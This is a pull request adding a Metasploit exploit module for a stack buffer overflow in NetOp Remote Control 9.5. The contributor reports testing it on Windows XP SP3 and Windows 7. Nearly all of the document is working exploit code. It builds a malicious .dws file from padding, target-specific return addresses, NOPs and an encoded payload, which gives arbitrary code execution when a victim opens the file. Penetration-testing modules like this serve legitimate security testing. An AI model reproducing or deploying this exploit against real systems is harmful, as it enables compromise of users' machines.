### PR TITLE
New NetOp Guest msf module http://www.netop.com/

### DIFF
--- a/modules/exploits/windows/fileformat/netop.rb
+++ b/modules/exploits/windows/fileformat/netop.rb
@@ -1,0 +1,85 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'NetOp Remote Control 9.5 Buffer Overflow',
+			'Description'	=> %q{
+					This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.
+				When opeining a .dws file containing a specially crafted string longer then 520 
+				characters will allow an attacker to execute arbitraty code.
+			},
+			'License'		=> MSF_LICENSE,
+			'Author'		=>
+				[
+					'Ruben Alejandro "chap0"',	
+					
+				],
+			'References'	=>
+				[
+					[ 'OSVDB', '72291' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/17223/' ]
+				],
+			'DefaultOptions' =>
+				{
+					'ExitFunction' => 'process',
+					'DisablePayloadHandler' => 'true',
+				},
+			'Platform'	=> 'win',
+			'Payload'	=>
+				{
+					'Space' => 2000,
+					'BadChars' => "\x00\x0a\x0d",
+					'DisableNops' => true,
+					'StackAdjustment' => -3500,
+				},
+
+			'Targets'		=>
+				[
+					[ 'Windows XP SP3',
+						{
+							'Ret'    => 0x223159fc,		# push esp #  ret  - NFMNT.dll
+							'Offset' => 524
+						}
+					],
+				
+					[ 'Windows 7',
+						{
+							'Ret'	 => 0x20d6c32c,		# push esp #  ret  - nrp.DLL
+							'Offset' => 524
+						}
+					],
+				],
+			'Privileged'	=> false,
+			'DisclosureDate'=> 'Apr 28 2011',
+			'DefaultTarget'	=> 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ false, 'The file name.', 'msf.dws']),
+			], self.class)
+
+	end
+
+	def exploit
+
+		buffer =  rand_text(target['Offset'])	
+		buffer << [target.ret].pack('V')	
+		buffer << make_nops(30)
+		buffer << payload.encoded
+
+		file_create(buffer)
+
+	end
+end


### PR DESCRIPTION
Created a msf module for NetOp Guest remote control software, supports windows xp sp3 and win 7 tested on both. The software is not free and I do not know if a trail is available for the vulnerable version which is 9.5. I may have a copy if that will help any. Anything else let me know.
